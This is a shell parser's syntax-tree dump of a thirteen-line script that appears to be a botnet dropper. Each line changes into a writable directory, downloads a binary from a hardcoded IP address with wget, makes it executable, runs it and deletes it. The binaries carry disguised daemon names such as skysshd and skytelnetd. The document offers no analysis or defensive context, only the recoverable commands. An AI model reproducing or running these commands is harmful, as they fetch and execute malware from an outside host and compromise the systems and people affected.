ListNode(lineno=2, pos=(12, 145), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://212.237.53.46/skyntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 118), parts=[
    WordNode(lineno=2, pos=(102, 107), word='chmod'),
    WordNode(lineno=2, pos=(108, 110), word='+x'),
    WordNode(lineno=2, pos=(111, 118), word='skyntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 129), parts=[
    WordNode(lineno=2, pos=(120, 129), word='./skyntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(129, 130)),
  CommandNode(lineno=2, pos=(131, 145), parts=[
    WordNode(lineno=2, pos=(131, 133), word='rm'),
    WordNode(lineno=2, pos=(134, 137), word='-rf'),
    WordNode(lineno=2, pos=(138, 145), word='skyntpd'),
  ]),
])
ListNode(lineno=3, pos=(146, 279), parts=[
  CommandNode(lineno=3, pos=(146, 153), parts=[
    WordNode(lineno=3, pos=(146, 148), word='cd'),
    WordNode(lineno=3, pos=(149, 153), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(154, 156)),
  CommandNode(lineno=3, pos=(157, 168), parts=[
    WordNode(lineno=3, pos=(157, 159), word='cd'),
    WordNode(lineno=3, pos=(160, 168), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(169, 171)),
  CommandNode(lineno=3, pos=(172, 179), parts=[
    WordNode(lineno=3, pos=(172, 174), word='cd'),
    WordNode(lineno=3, pos=(175, 179), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 191), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 191), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(192, 194)),
  CommandNode(lineno=3, pos=(195, 199), parts=[
    WordNode(lineno=3, pos=(195, 197), word='cd'),
    WordNode(lineno=3, pos=(198, 199), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(199, 200)),
  CommandNode(lineno=3, pos=(201, 234), parts=[
    WordNode(lineno=3, pos=(201, 205), word='wget'),
    WordNode(lineno=3, pos=(206, 234), word='http://212.237.53.46/skysshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(234, 235)),
  CommandNode(lineno=3, pos=(236, 252), parts=[
    WordNode(lineno=3, pos=(236, 241), word='chmod'),
    WordNode(lineno=3, pos=(242, 244), word='+x'),
    WordNode(lineno=3, pos=(245, 252), word='skysshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(252, 253)),
  CommandNode(lineno=3, pos=(254, 263), parts=[
    WordNode(lineno=3, pos=(254, 263), word='./skysshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(263, 264)),
  CommandNode(lineno=3, pos=(265, 279), parts=[
    WordNode(lineno=3, pos=(265, 267), word='rm'),
    WordNode(lineno=3, pos=(268, 271), word='-rf'),
    WordNode(lineno=3, pos=(272, 279), word='skysshd'),
  ]),
])
ListNode(lineno=4, pos=(280, 425), parts=[
  CommandNode(lineno=4, pos=(280, 287), parts=[
    WordNode(lineno=4, pos=(280, 282), word='cd'),
    WordNode(lineno=4, pos=(283, 287), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(288, 290)),
  CommandNode(lineno=4, pos=(291, 302), parts=[
    WordNode(lineno=4, pos=(291, 293), word='cd'),
    WordNode(lineno=4, pos=(294, 302), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(303, 305)),
  CommandNode(lineno=4, pos=(306, 313), parts=[
    WordNode(lineno=4, pos=(306, 308), word='cd'),
    WordNode(lineno=4, pos=(309, 313), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(314, 316)),
  CommandNode(lineno=4, pos=(317, 325), parts=[
    WordNode(lineno=4, pos=(317, 319), word='cd'),
    WordNode(lineno=4, pos=(320, 325), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(326, 328)),
  CommandNode(lineno=4, pos=(329, 333), parts=[
    WordNode(lineno=4, pos=(329, 331), word='cd'),
    WordNode(lineno=4, pos=(332, 333), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(333, 334)),
  CommandNode(lineno=4, pos=(335, 371), parts=[
    WordNode(lineno=4, pos=(335, 339), word='wget'),
    WordNode(lineno=4, pos=(340, 371), word='http://212.237.53.46/skyopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(371, 372)),
  CommandNode(lineno=4, pos=(373, 392), parts=[
    WordNode(lineno=4, pos=(373, 378), word='chmod'),
    WordNode(lineno=4, pos=(379, 381), word='+x'),
    WordNode(lineno=4, pos=(382, 392), word='skyopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(392, 393)),
  CommandNode(lineno=4, pos=(394, 406), parts=[
    WordNode(lineno=4, pos=(394, 406), word='./skyopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(406, 407)),
  CommandNode(lineno=4, pos=(408, 425), parts=[
    WordNode(lineno=4, pos=(408, 410), word='rm'),
    WordNode(lineno=4, pos=(411, 414), word='-rf'),
    WordNode(lineno=4, pos=(415, 425), word='skyopenssh'),
  ]),
])
ListNode(lineno=5, pos=(426, 559), parts=[
  CommandNode(lineno=5, pos=(426, 433), parts=[
    WordNode(lineno=5, pos=(426, 428), word='cd'),
    WordNode(lineno=5, pos=(429, 433), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(434, 436)),
  CommandNode(lineno=5, pos=(437, 448), parts=[
    WordNode(lineno=5, pos=(437, 439), word='cd'),
    WordNode(lineno=5, pos=(440, 448), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(449, 451)),
  CommandNode(lineno=5, pos=(452, 459), parts=[
    WordNode(lineno=5, pos=(452, 454), word='cd'),
    WordNode(lineno=5, pos=(455, 459), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(460, 462)),
  CommandNode(lineno=5, pos=(463, 471), parts=[
    WordNode(lineno=5, pos=(463, 465), word='cd'),
    WordNode(lineno=5, pos=(466, 471), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(472, 474)),
  CommandNode(lineno=5, pos=(475, 479), parts=[
    WordNode(lineno=5, pos=(475, 477), word='cd'),
    WordNode(lineno=5, pos=(478, 479), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(479, 480)),
  CommandNode(lineno=5, pos=(481, 514), parts=[
    WordNode(lineno=5, pos=(481, 485), word='wget'),
    WordNode(lineno=5, pos=(486, 514), word='http://212.237.53.46/skybash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(514, 515)),
  CommandNode(lineno=5, pos=(516, 532), parts=[
    WordNode(lineno=5, pos=(516, 521), word='chmod'),
    WordNode(lineno=5, pos=(522, 524), word='+x'),
    WordNode(lineno=5, pos=(525, 532), word='skybash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(532, 533)),
  CommandNode(lineno=5, pos=(534, 543), parts=[
    WordNode(lineno=5, pos=(534, 543), word='./skybash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(543, 544)),
  CommandNode(lineno=5, pos=(545, 559), parts=[
    WordNode(lineno=5, pos=(545, 547), word='rm'),
    WordNode(lineno=5, pos=(548, 551), word='-rf'),
    WordNode(lineno=5, pos=(552, 559), word='skybash'),
  ]),
])
ListNode(lineno=6, pos=(560, 693), parts=[
  CommandNode(lineno=6, pos=(560, 567), parts=[
    WordNode(lineno=6, pos=(560, 562), word='cd'),
    WordNode(lineno=6, pos=(563, 567), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(568, 570)),
  CommandNode(lineno=6, pos=(571, 582), parts=[
    WordNode(lineno=6, pos=(571, 573), word='cd'),
    WordNode(lineno=6, pos=(574, 582), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(583, 585)),
  CommandNode(lineno=6, pos=(586, 593), parts=[
    WordNode(lineno=6, pos=(586, 588), word='cd'),
    WordNode(lineno=6, pos=(589, 593), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(594, 596)),
  CommandNode(lineno=6, pos=(597, 605), parts=[
    WordNode(lineno=6, pos=(597, 599), word='cd'),
    WordNode(lineno=6, pos=(600, 605), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(606, 608)),
  CommandNode(lineno=6, pos=(609, 613), parts=[
    WordNode(lineno=6, pos=(609, 611), word='cd'),
    WordNode(lineno=6, pos=(612, 613), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(613, 614)),
  CommandNode(lineno=6, pos=(615, 648), parts=[
    WordNode(lineno=6, pos=(615, 619), word='wget'),
    WordNode(lineno=6, pos=(620, 648), word='http://212.237.53.46/skytftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(648, 649)),
  CommandNode(lineno=6, pos=(650, 666), parts=[
    WordNode(lineno=6, pos=(650, 655), word='chmod'),
    WordNode(lineno=6, pos=(656, 658), word='+x'),
    WordNode(lineno=6, pos=(659, 666), word='skytftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(666, 667)),
  CommandNode(lineno=6, pos=(668, 677), parts=[
    WordNode(lineno=6, pos=(668, 677), word='./skytftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(677, 678)),
  CommandNode(lineno=6, pos=(679, 693), parts=[
    WordNode(lineno=6, pos=(679, 681), word='rm'),
    WordNode(lineno=6, pos=(682, 685), word='-rf'),
    WordNode(lineno=6, pos=(686, 693), word='skytftp'),
  ]),
])
ListNode(lineno=7, pos=(694, 827), parts=[
  CommandNode(lineno=7, pos=(694, 701), parts=[
    WordNode(lineno=7, pos=(694, 696), word='cd'),
    WordNode(lineno=7, pos=(697, 701), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(702, 704)),
  CommandNode(lineno=7, pos=(705, 716), parts=[
    WordNode(lineno=7, pos=(705, 707), word='cd'),
    WordNode(lineno=7, pos=(708, 716), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(717, 719)),
  CommandNode(lineno=7, pos=(720, 727), parts=[
    WordNode(lineno=7, pos=(720, 722), word='cd'),
    WordNode(lineno=7, pos=(723, 727), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(728, 730)),
  CommandNode(lineno=7, pos=(731, 739), parts=[
    WordNode(lineno=7, pos=(731, 733), word='cd'),
    WordNode(lineno=7, pos=(734, 739), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(740, 742)),
  CommandNode(lineno=7, pos=(743, 747), parts=[
    WordNode(lineno=7, pos=(743, 745), word='cd'),
    WordNode(lineno=7, pos=(746, 747), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(747, 748)),
  CommandNode(lineno=7, pos=(749, 782), parts=[
    WordNode(lineno=7, pos=(749, 753), word='wget'),
    WordNode(lineno=7, pos=(754, 782), word='http://212.237.53.46/skywget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(782, 783)),
  CommandNode(lineno=7, pos=(784, 800), parts=[
    WordNode(lineno=7, pos=(784, 789), word='chmod'),
    WordNode(lineno=7, pos=(790, 792), word='+x'),
    WordNode(lineno=7, pos=(793, 800), word='skywget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(800, 801)),
  CommandNode(lineno=7, pos=(802, 811), parts=[
    WordNode(lineno=7, pos=(802, 811), word='./skywget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(811, 812)),
  CommandNode(lineno=7, pos=(813, 827), parts=[
    WordNode(lineno=7, pos=(813, 815), word='rm'),
    WordNode(lineno=7, pos=(816, 819), word='-rf'),
    WordNode(lineno=7, pos=(820, 827), word='skywget'),
  ]),
])
ListNode(lineno=8, pos=(828, 961), parts=[
  CommandNode(lineno=8, pos=(828, 835), parts=[
    WordNode(lineno=8, pos=(828, 830), word='cd'),
    WordNode(lineno=8, pos=(831, 835), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(836, 838)),
  CommandNode(lineno=8, pos=(839, 850), parts=[
    WordNode(lineno=8, pos=(839, 841), word='cd'),
    WordNode(lineno=8, pos=(842, 850), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(851, 853)),
  CommandNode(lineno=8, pos=(854, 861), parts=[
    WordNode(lineno=8, pos=(854, 856), word='cd'),
    WordNode(lineno=8, pos=(857, 861), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(862, 864)),
  CommandNode(lineno=8, pos=(865, 873), parts=[
    WordNode(lineno=8, pos=(865, 867), word='cd'),
    WordNode(lineno=8, pos=(868, 873), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(874, 876)),
  CommandNode(lineno=8, pos=(877, 881), parts=[
    WordNode(lineno=8, pos=(877, 879), word='cd'),
    WordNode(lineno=8, pos=(880, 881), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(881, 882)),
  CommandNode(lineno=8, pos=(883, 916), parts=[
    WordNode(lineno=8, pos=(883, 887), word='wget'),
    WordNode(lineno=8, pos=(888, 916), word='http://212.237.53.46/skycron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(916, 917)),
  CommandNode(lineno=8, pos=(918, 934), parts=[
    WordNode(lineno=8, pos=(918, 923), word='chmod'),
    WordNode(lineno=8, pos=(924, 926), word='+x'),
    WordNode(lineno=8, pos=(927, 934), word='skycron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(934, 935)),
  CommandNode(lineno=8, pos=(936, 945), parts=[
    WordNode(lineno=8, pos=(936, 945), word='./skycron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(945, 946)),
  CommandNode(lineno=8, pos=(947, 961), parts=[
    WordNode(lineno=8, pos=(947, 949), word='rm'),
    WordNode(lineno=8, pos=(950, 953), word='-rf'),
    WordNode(lineno=8, pos=(954, 961), word='skycron'),
  ]),
])
ListNode(lineno=9, pos=(962, 1091), parts=[
  CommandNode(lineno=9, pos=(962, 969), parts=[
    WordNode(lineno=9, pos=(962, 964), word='cd'),
    WordNode(lineno=9, pos=(965, 969), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(970, 972)),
  CommandNode(lineno=9, pos=(973, 984), parts=[
    WordNode(lineno=9, pos=(973, 975), word='cd'),
    WordNode(lineno=9, pos=(976, 984), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(985, 987)),
  CommandNode(lineno=9, pos=(988, 995), parts=[
    WordNode(lineno=9, pos=(988, 990), word='cd'),
    WordNode(lineno=9, pos=(991, 995), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(996, 998)),
  CommandNode(lineno=9, pos=(999, 1007), parts=[
    WordNode(lineno=9, pos=(999, 1001), word='cd'),
    WordNode(lineno=9, pos=(1002, 1007), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1008, 1010)),
  CommandNode(lineno=9, pos=(1011, 1015), parts=[
    WordNode(lineno=9, pos=(1011, 1013), word='cd'),
    WordNode(lineno=9, pos=(1014, 1015), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1015, 1016)),
  CommandNode(lineno=9, pos=(1017, 1049), parts=[
    WordNode(lineno=9, pos=(1017, 1021), word='wget'),
    WordNode(lineno=9, pos=(1022, 1049), word='http://212.237.53.46/skyftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1049, 1050)),
  CommandNode(lineno=9, pos=(1051, 1066), parts=[
    WordNode(lineno=9, pos=(1051, 1056), word='chmod'),
    WordNode(lineno=9, pos=(1057, 1059), word='+x'),
    WordNode(lineno=9, pos=(1060, 1066), word='skyftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1066, 1067)),
  CommandNode(lineno=9, pos=(1068, 1076), parts=[
    WordNode(lineno=9, pos=(1068, 1076), word='./skyftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1076, 1077)),
  CommandNode(lineno=9, pos=(1078, 1091), parts=[
    WordNode(lineno=9, pos=(1078, 1080), word='rm'),
    WordNode(lineno=9, pos=(1081, 1084), word='-rf'),
    WordNode(lineno=9, pos=(1085, 1091), word='skyftp'),
  ]),
])
ListNode(lineno=10, pos=(1092, 1225), parts=[
  CommandNode(lineno=10, pos=(1092, 1099), parts=[
    WordNode(lineno=10, pos=(1092, 1094), word='cd'),
    WordNode(lineno=10, pos=(1095, 1099), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1100, 1102)),
  CommandNode(lineno=10, pos=(1103, 1114), parts=[
    WordNode(lineno=10, pos=(1103, 1105), word='cd'),
    WordNode(lineno=10, pos=(1106, 1114), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1115, 1117)),
  CommandNode(lineno=10, pos=(1118, 1125), parts=[
    WordNode(lineno=10, pos=(1118, 1120), word='cd'),
    WordNode(lineno=10, pos=(1121, 1125), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1126, 1128)),
  CommandNode(lineno=10, pos=(1129, 1137), parts=[
    WordNode(lineno=10, pos=(1129, 1131), word='cd'),
    WordNode(lineno=10, pos=(1132, 1137), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1138, 1140)),
  CommandNode(lineno=10, pos=(1141, 1145), parts=[
    WordNode(lineno=10, pos=(1141, 1143), word='cd'),
    WordNode(lineno=10, pos=(1144, 1145), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1145, 1146)),
  CommandNode(lineno=10, pos=(1147, 1180), parts=[
    WordNode(lineno=10, pos=(1147, 1151), word='wget'),
    WordNode(lineno=10, pos=(1152, 1180), word='http://212.237.53.46/skypftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1180, 1181)),
  CommandNode(lineno=10, pos=(1182, 1198), parts=[
    WordNode(lineno=10, pos=(1182, 1187), word='chmod'),
    WordNode(lineno=10, pos=(1188, 1190), word='+x'),
    WordNode(lineno=10, pos=(1191, 1198), word='skypftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1198, 1199)),
  CommandNode(lineno=10, pos=(1200, 1209), parts=[
    WordNode(lineno=10, pos=(1200, 1209), word='./skypftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1209, 1210)),
  CommandNode(lineno=10, pos=(1211, 1225), parts=[
    WordNode(lineno=10, pos=(1211, 1213), word='rm'),
    WordNode(lineno=10, pos=(1214, 1217), word='-rf'),
    WordNode(lineno=10, pos=(1218, 1225), word='skypftp'),
  ]),
])
ListNode(lineno=11, pos=(1226, 1351), parts=[
  CommandNode(lineno=11, pos=(1226, 1233), parts=[
    WordNode(lineno=11, pos=(1226, 1228), word='cd'),
    WordNode(lineno=11, pos=(1229, 1233), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1234, 1236)),
  CommandNode(lineno=11, pos=(1237, 1248), parts=[
    WordNode(lineno=11, pos=(1237, 1239), word='cd'),
    WordNode(lineno=11, pos=(1240, 1248), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1249, 1251)),
  CommandNode(lineno=11, pos=(1252, 1259), parts=[
    WordNode(lineno=11, pos=(1252, 1254), word='cd'),
    WordNode(lineno=11, pos=(1255, 1259), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1260, 1262)),
  CommandNode(lineno=11, pos=(1263, 1271), parts=[
    WordNode(lineno=11, pos=(1263, 1265), word='cd'),
    WordNode(lineno=11, pos=(1266, 1271), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1272, 1274)),
  CommandNode(lineno=11, pos=(1275, 1279), parts=[
    WordNode(lineno=11, pos=(1275, 1277), word='cd'),
    WordNode(lineno=11, pos=(1278, 1279), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1279, 1280)),
  CommandNode(lineno=11, pos=(1281, 1312), parts=[
    WordNode(lineno=11, pos=(1281, 1285), word='wget'),
    WordNode(lineno=11, pos=(1286, 1312), word='http://212.237.53.46/skysh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1312, 1313)),
  CommandNode(lineno=11, pos=(1314, 1328), parts=[
    WordNode(lineno=11, pos=(1314, 1319), word='chmod'),
    WordNode(lineno=11, pos=(1320, 1322), word='+x'),
    WordNode(lineno=11, pos=(1323, 1328), word='skysh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1328, 1329)),
  CommandNode(lineno=11, pos=(1330, 1337), parts=[
    WordNode(lineno=11, pos=(1330, 1337), word='./skysh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1337, 1338)),
  CommandNode(lineno=11, pos=(1339, 1351), parts=[
    WordNode(lineno=11, pos=(1339, 1341), word='rm'),
    WordNode(lineno=11, pos=(1342, 1345), word='-rf'),
    WordNode(lineno=11, pos=(1346, 1351), word='skysh'),
  ]),
])
ListNode(lineno=12, pos=(1352, 1469), parts=[
  CommandNode(lineno=12, pos=(1352, 1359), parts=[
    WordNode(lineno=12, pos=(1352, 1354), word='cd'),
    WordNode(lineno=12, pos=(1355, 1359), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1360, 1362)),
  CommandNode(lineno=12, pos=(1363, 1374), parts=[
    WordNode(lineno=12, pos=(1363, 1365), word='cd'),
    WordNode(lineno=12, pos=(1366, 1374), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1375, 1377)),
  CommandNode(lineno=12, pos=(1378, 1385), parts=[
    WordNode(lineno=12, pos=(1378, 1380), word='cd'),
    WordNode(lineno=12, pos=(1381, 1385), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1386, 1388)),
  CommandNode(lineno=12, pos=(1389, 1397), parts=[
    WordNode(lineno=12, pos=(1389, 1391), word='cd'),
    WordNode(lineno=12, pos=(1392, 1397), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1398, 1400)),
  CommandNode(lineno=12, pos=(1401, 1405), parts=[
    WordNode(lineno=12, pos=(1401, 1403), word='cd'),
    WordNode(lineno=12, pos=(1404, 1405), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1405, 1406)),
  CommandNode(lineno=12, pos=(1407, 1436), parts=[
    WordNode(lineno=12, pos=(1407, 1411), word='wget'),
    WordNode(lineno=12, pos=(1412, 1436), word='http://212.237.53.46/sky'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1436, 1437)),
  CommandNode(lineno=12, pos=(1438, 1450), parts=[
    WordNode(lineno=12, pos=(1438, 1443), word='chmod'),
    WordNode(lineno=12, pos=(1444, 1446), word='+x'),
    WordNode(lineno=12, pos=(1447, 1450), word='sky'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1450, 1451)),
  CommandNode(lineno=12, pos=(1452, 1457), parts=[
    WordNode(lineno=12, pos=(1452, 1457), word='./sky'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1457, 1458)),
  CommandNode(lineno=12, pos=(1459, 1469), parts=[
    WordNode(lineno=12, pos=(1459, 1461), word='rm'),
    WordNode(lineno=12, pos=(1462, 1465), word='-rf'),
    WordNode(lineno=12, pos=(1466, 1469), word='sky'),
  ]),
])
ListNode(lineno=13, pos=(1470, 1615), parts=[
  CommandNode(lineno=13, pos=(1470, 1477), parts=[
    WordNode(lineno=13, pos=(1470, 1472), word='cd'),
    WordNode(lineno=13, pos=(1473, 1477), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1478, 1480)),
  CommandNode(lineno=13, pos=(1481, 1492), parts=[
    WordNode(lineno=13, pos=(1481, 1483), word='cd'),
    WordNode(lineno=13, pos=(1484, 1492), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1493, 1495)),
  CommandNode(lineno=13, pos=(1496, 1503), parts=[
    WordNode(lineno=13, pos=(1496, 1498), word='cd'),
    WordNode(lineno=13, pos=(1499, 1503), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1504, 1506)),
  CommandNode(lineno=13, pos=(1507, 1515), parts=[
    WordNode(lineno=13, pos=(1507, 1509), word='cd'),
    WordNode(lineno=13, pos=(1510, 1515), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1516, 1518)),
  CommandNode(lineno=13, pos=(1519, 1523), parts=[
    WordNode(lineno=13, pos=(1519, 1521), word='cd'),
    WordNode(lineno=13, pos=(1522, 1523), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1523, 1524)),
  CommandNode(lineno=13, pos=(1525, 1561), parts=[
    WordNode(lineno=13, pos=(1525, 1529), word='wget'),
    WordNode(lineno=13, pos=(1530, 1561), word='http://212.237.53.46/skyapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1561, 1562)),
  CommandNode(lineno=13, pos=(1563, 1582), parts=[
    WordNode(lineno=13, pos=(1563, 1568), word='chmod'),
    WordNode(lineno=13, pos=(1569, 1571), word='+x'),
    WordNode(lineno=13, pos=(1572, 1582), word='skyapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1582, 1583)),
  CommandNode(lineno=13, pos=(1584, 1596), parts=[
    WordNode(lineno=13, pos=(1584, 1596), word='./skyapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1596, 1597)),
  CommandNode(lineno=13, pos=(1598, 1615), parts=[
    WordNode(lineno=13, pos=(1598, 1600), word='rm'),
    WordNode(lineno=13, pos=(1601, 1604), word='-rf'),
    WordNode(lineno=13, pos=(1605, 1615), word='skyapache2'),
  ]),
])
ListNode(lineno=14, pos=(1616, 1761), parts=[
  CommandNode(lineno=14, pos=(1616, 1623), parts=[
    WordNode(lineno=14, pos=(1616, 1618), word='cd'),
    WordNode(lineno=14, pos=(1619, 1623), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1624, 1626)),
  CommandNode(lineno=14, pos=(1627, 1638), parts=[
    WordNode(lineno=14, pos=(1627, 1629), word='cd'),
    WordNode(lineno=14, pos=(1630, 1638), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1639, 1641)),
  CommandNode(lineno=14, pos=(1642, 1649), parts=[
    WordNode(lineno=14, pos=(1642, 1644), word='cd'),
    WordNode(lineno=14, pos=(1645, 1649), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1650, 1652)),
  CommandNode(lineno=14, pos=(1653, 1661), parts=[
    WordNode(lineno=14, pos=(1653, 1655), word='cd'),
    WordNode(lineno=14, pos=(1656, 1661), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1662, 1664)),
  CommandNode(lineno=14, pos=(1665, 1669), parts=[
    WordNode(lineno=14, pos=(1665, 1667), word='cd'),
    WordNode(lineno=14, pos=(1668, 1669), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1669, 1670)),
  CommandNode(lineno=14, pos=(1671, 1707), parts=[
    WordNode(lineno=14, pos=(1671, 1675), word='wget'),
    WordNode(lineno=14, pos=(1676, 1707), word='http://212.237.53.46/skytelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1707, 1708)),
  CommandNode(lineno=14, pos=(1709, 1728), parts=[
    WordNode(lineno=14, pos=(1709, 1714), word='chmod'),
    WordNode(lineno=14, pos=(1715, 1717), word='+x'),
    WordNode(lineno=14, pos=(1718, 1728), word='skytelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1728, 1729)),
  CommandNode(lineno=14, pos=(1730, 1742), parts=[
    WordNode(lineno=14, pos=(1730, 1742), word='./skytelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1742, 1743)),
  CommandNode(lineno=14, pos=(1744, 1761), parts=[
    WordNode(lineno=14, pos=(1744, 1746), word='rm'),
    WordNode(lineno=14, pos=(1747, 1750), word='-rf'),
    WordNode(lineno=14, pos=(1751, 1761), word='skytelnetd'),
  ]),
])
